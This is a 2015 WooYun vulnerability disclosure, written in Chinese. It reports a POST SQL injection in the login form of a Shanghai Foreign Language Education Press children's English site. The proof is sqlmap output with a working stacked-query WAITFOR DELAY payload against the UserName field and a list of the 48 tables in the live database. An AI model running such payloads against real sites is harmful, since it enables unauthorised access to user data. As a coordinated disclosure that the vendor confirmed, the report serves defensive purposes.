漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0139294
漏洞标题:上海外语教育出版社某站post注入
相关厂商:sflep.com
漏洞作者: 路人甲
提交时间:2015-09-06 15:25
修复时间:2015-10-21 15:38
公开时间:2015-10-21 15:38
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
									2015-09-06:	细节已通知厂商并且等待厂商处理中
									2015-09-06:	厂商已经确认,细节仅向厂商公开
									2015-09-16:	细节向核心白帽子及相关领域专家公开
									2015-09-26:	细节向普通白帽子公开
									2015-10-06:	细节向实习白帽子公开
									2015-10-21:	细节向公众公开
								
简要描述:
厂商秒确认
详细说明:
上海外语教育出版社思飞小学英语 用户登陆处一枚post注入
参数UserName=a&Password=a
都有问题 
漏洞证明:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: UserName (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=dDwtMjQzNDUzODA0O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDU+Oz47bDx
0PHA8cDxsPFRleHQ7PjtsPOaXoOazleeZu+mZhiDor7fmo4Dmn6XnlKjmiLflkI3lr4bnoIE7Pj47Pjs
7Pjs+Pjs+PjtsPFNpZ247Pj6hNUWpKN8a7a1y/m/muL895vAB4Q==&__VIEWSTATEGENERATOR=1B54E
FAC&UserName=a';WAITFOR DELAY '0:0:5'--&Password=a&Sign.x=32&Sign.y=14
---
[14:09:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
current database:    'WSSOA'
Database: WSSOA
[48 tables]
+------------------------+
| AddressList_UserAccess |
| CCS_App                |
| CCS_Config             |
| CCS_Event              |
| CCS_EventInBox         |
| CCS_EventOutBox        |
| CCS_EventReceive       |
| CCS_EventSend          |
| CCS_EventSubscription  |
| CCS_Message            |
| CCS_PublicConfiger     |
| CCS_ServiceLog         |
| CCS_SystemStatics      |
| CCS_UserMessage_Rel    |
| CCS_WebPart            |
| Class                  |
| Contacts               |
| Dept                   |
| Domain                 |
| Group                  |
| Link                   |
| Node                   |
| PageClass              |
| PageSole               |
| Relation               |
| Rele                   |
| SignInType             |
| SiteType               |
| Type                   |
| UIDUser                |
| USID                   |
| User                   |
| VCCS_Event             |
| VCCS_EventInBox        |
| VCCS_EventSubscription |
| VCCS_WebPart           |
| VContacts              |
| VContactsCount         |
| VContactsNormal        |
| VContactsStatus        |
| VDept                  |
| VDeptUser              |
| View_MP3Web_User       |
| View_NCPE_UserList     |
| View_MP3Web_User'      |
| dtproperties           |
| sysconstraints         |
| syssegments            |
+------------------------+
 
修复方案:
1
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2015-09-06 15:37
厂商回复:
感谢指出漏洞
最新状态:
暂无
